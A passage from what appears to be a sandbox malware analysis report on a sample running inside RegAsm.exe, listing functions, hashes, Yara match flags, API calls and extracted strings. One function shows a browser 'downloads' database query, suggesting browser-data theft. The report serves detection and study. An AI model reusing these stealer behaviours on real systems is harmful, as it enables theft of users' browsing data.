                                                    • database corruption, xrefs: 1FA6FE7D
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                    • API String ID: 0-2528248365
                                                    • Opcode ID: efefe8dfd35c34d0932b0f4413f789346e63877856f959effd209e2211a7cdca
                                                    • Instruction ID: 9c219a41294027266e839b9a875736c52f8b4e424bedc21be7c47f2f9567b3e4
                                                    • Opcode Fuzzy Hash: efefe8dfd35c34d0932b0f4413f789346e63877856f959effd209e2211a7cdca
                                                    • Instruction Fuzzy Hash: 7B3118A81252818AD3158F24C400762BBA1BF55358FA4D5CDE8898F793E37FC4C7DBA6
                                                    Function 1FA7D6F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s%s
                                                    • API String ID: 0-3252725368
                                                    • Opcode ID: adf5cd2804f4a3425e07da455d1c113dcdc186116f53f697e2d646e2eb386141
                                                    • Instruction ID: f2f6a164bd31dcc5b3af71a2d7ff77e5dc1ab44fa674fa28082aa83ea2b8b046
                                                    • Opcode Fuzzy Hash: adf5cd2804f4a3425e07da455d1c113dcdc186116f53f697e2d646e2eb386141
                                                    • Instruction Fuzzy Hash: 801193769042219BDB019B19D9C4A9737B9EF81679F040165FA48DA200EB3FA524D7E2
                                                    Function 1FAD1F70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • JSON path error near '%q', xrefs: 1FAD1F92
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: JSON path error near '%q'
                                                    • API String ID: 0-481711382
                                                    • Opcode ID: 76251ebce43c1d1d38e75680e8664ed9a34c75c1f7191f3f1fe1d763f5760ebc
                                                    • Instruction ID: 2eb0df3b6e11c426f85b2a69c30206bd4478d96d30708188761325ab0e921491
                                                    • Opcode Fuzzy Hash: 76251ebce43c1d1d38e75680e8664ed9a34c75c1f7191f3f1fe1d763f5760ebc
                                                    • Instruction Fuzzy Hash: 520104727093116EEB149A549D00B9B7BD4DF41330F20066DF895962D0EB7DF80183E2
                                                    Function 1FA31DF0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • %s at line %d of [%.10s], xrefs: 1FA31E63
                                                    • misuse, xrefs: 1FA31E59
                                                    • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1FA31E53
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                    • API String ID: 0-3564305576
                                                    • Opcode ID: b8548fa615eb5398b4e0d56efbbf20ad042fa209eb00d9ac379126e4e047234f
                                                    • Instruction ID: f5a06e98c7facb637a92263028592e5d2a212c214e3fc3791b8a011e61480272
                                                    • Opcode Fuzzy Hash: b8548fa615eb5398b4e0d56efbbf20ad042fa209eb00d9ac379126e4e047234f
                                                    • Instruction Fuzzy Hash: 5A11E034F086509FD704CE38D844AA6BBB8AF46B16F240498E445CB322D33EF915C7A2
                                                    Function 1FA4F0E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • INSERT INTO %Q.%Q(%Q) VALUES('flush'), xrefs: 1FA4F105
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: INSERT INTO %Q.%Q(%Q) VALUES('flush')
                                                    • API String ID: 0-2312637080
                                                    • Opcode ID: 0158df8079c84f167375b3e1266bfbf0cb8cc0ba52224f7369e19514ad3a72fd
                                                    • Instruction ID: d5eb36b4a6c0abfd74f7fa4a501f859cf55c9a525c4e7d8ea43ff49941dbb169
                                                    • Opcode Fuzzy Hash: 0158df8079c84f167375b3e1266bfbf0cb8cc0ba52224f7369e19514ad3a72fd
                                                    • Instruction Fuzzy Hash: 2201923A3043415ED321866EFC44F97B7D8EBC4620F190469F6ADC3201D369B8869671
                                                    Function 1FA50D70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • INSERT INTO %Q.%Q(%Q) VALUES('flush'), xrefs: 1FA50D87
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: INSERT INTO %Q.%Q(%Q) VALUES('flush')
                                                    • API String ID: 0-2312637080
                                                    • Opcode ID: a95a3b51dde77aa563aad239c66a8cc672628064e78196a9c39d2739834cde38
                                                    • Instruction ID: 0a41dd2cd5fa94f23568b74bc97b2bd8b4639ce82a91a74760ca5020325a7108
                                                    • Opcode Fuzzy Hash: a95a3b51dde77aa563aad239c66a8cc672628064e78196a9c39d2739834cde38
                                                    • Instruction Fuzzy Hash: 2A01697A244301AFE3509A59ED80F82B7E9EB88724F544458FA8DDB240E67ABC4587A1
                                                    Function 1FA2EF30 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • %s at line %d of [%.10s], xrefs: 1FA2EFB5
                                                    • misuse, xrefs: 1FA2EFB0
                                                    • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1FA2EFA6
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                    • API String ID: 0-3564305576
                                                    • Opcode ID: 409153692e7f42a548164076e2550cc35fe88950d191a4fc00e818497e955d01
                                                    • Instruction ID: 276075d5d13025b61877b6b4503eb1ee359e51cbb05e75f67335091b3d5968eb
                                                    • Opcode Fuzzy Hash: 409153692e7f42a548164076e2550cc35fe88950d191a4fc00e818497e955d01
                                                    • Instruction Fuzzy Hash: F001B9B16096229FD700CF09D884B8B7BE1AFC1724F454458E7445B381D33AE855D7A6
                                                    Function 1FA99180 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s_stat
                                                    • API String ID: 0-920702477
                                                    • Opcode ID: e64adb737920aa40e5617fd053bea3f89e1a8e3c1c2d26a2d1d8c3c5d2f18342
                                                    • Instruction ID: 0999128f204b459875824fac43b0772f76094da08f6e786d29d75873691b2bde
                                                    • Opcode Fuzzy Hash: e64adb737920aa40e5617fd053bea3f89e1a8e3c1c2d26a2d1d8c3c5d2f18342
                                                    • Instruction Fuzzy Hash: 72F0A723B057523BE70046B9BE84B46EBD9BF45160F554635E40D96144D31EBCA153E1
                                                    Function 1FA47F70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN), xrefs: 1FA47F76
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN)
                                                    • API String ID: 0-3072645960
                                                    • Opcode ID: 76c291101993cdb54395a264f385b623e71c7dc73e86dc28f7940974482332db
                                                    • Instruction ID: 9bf1f2b3fcbf1cd90fc937b7efff1a605d7af2cabd97c4fb5cb393e0c6243da5
                                                    • Opcode Fuzzy Hash: 76c291101993cdb54395a264f385b623e71c7dc73e86dc28f7940974482332db
                                                    • Instruction Fuzzy Hash: FBF0F67670434246E7015F18FC01BC97BD4AFC1311F690129F8449A190E76CE88687B1
                                                    Function 00412F18 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00413607,00000000), ref: 00412F23
                                                    • HeapAlloc.KERNEL32(00000000,?,?,00413607,00000000), ref: 00412F2A
                                                    • wsprintfW.USER32 ref: 00412F3E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocProcesswsprintf
                                                    • String ID: %hs
                                                    • API String ID: 659108358-2783943728
                                                    • Opcode ID: a0c19f69ea0b9f3987ab3f26ec27759df59495924eabe1d63ab0b4f4564690e2
                                                    • Instruction ID: 3b1422cf69cd7ca1c0b0579ce03a421fdcb529f04941721c5eeb921f539e643a
                                                    • Opcode Fuzzy Hash: a0c19f69ea0b9f3987ab3f26ec27759df59495924eabe1d63ab0b4f4564690e2
                                                    • Instruction Fuzzy Hash: ACD05B70B40209FFDB109FD0EC0AF6D7B74FB01749F904074F50596151D6715E119BA9
                                                    Function 004093A2 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 231stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                    • lstrlenA.KERNEL32(00000000), ref: 0040961B
                                                    • lstrlenA.KERNEL32(00000000), ref: 0040962F
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 00418DB9: _MSFOpenExW.MSPDB140-MSVCRT ref: 00418E6C
                                                      • Part of subcall function 00418DB9: CreateThread.KERNEL32(00000000,00000000,00418C65,?,00000000,00000000), ref: 00418E85
                                                      • Part of subcall function 00418DB9: WaitForSingleObject.KERNEL32(?,000003E8), ref: 00418E96
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrlen$lstrcat$CreateObjectOpenSingleThreadWait
                                                    • String ID: Downloads$SELECT target_path, tab_url from downloads
                                                    • API String ID: 3799617333-2176162482
                                                    • Opcode ID: be7eee8a815c2336f96c2534ce6039717bf2e88eff6cc5c104359396644c2202
                                                    • Instruction ID: 0fc1ef9a9322aaf7dc15fdb1fbf797ad4d90eb8131d920194bec06f8da6e6953
                                                    • Opcode Fuzzy Hash: be7eee8a815c2336f96c2534ce6039717bf2e88eff6cc5c104359396644c2202
                                                    • Instruction Fuzzy Hash: 5E81DE729101189ADF04FBA1DCA6DEE7379AF14305F50452EF216B21F1EE399A88CA58
                                                    Function 1FAC8EB0 Relevance: 6.2, APIs: 4, Instructions: 175COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2bffd2a73fa29da14e5fe807f868cd21d560acf72a7ffb1b5267154c030c0129
                                                    • Instruction ID: bcaa92d39f6056897e132bdc271e9b757d8cc628e46f42b7d412f6d933172867
                                                    • Opcode Fuzzy Hash: 2bffd2a73fa29da14e5fe807f868cd21d560acf72a7ffb1b5267154c030c0129
                                                    • Instruction Fuzzy Hash: 4F5107716043928AD711CE74984479AFFE8AF49311F094AA9E8C68B242E37DE588C361
                                                    Function 1FA47DA0 Relevance: 6.2, APIs: 4, Instructions: 150COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
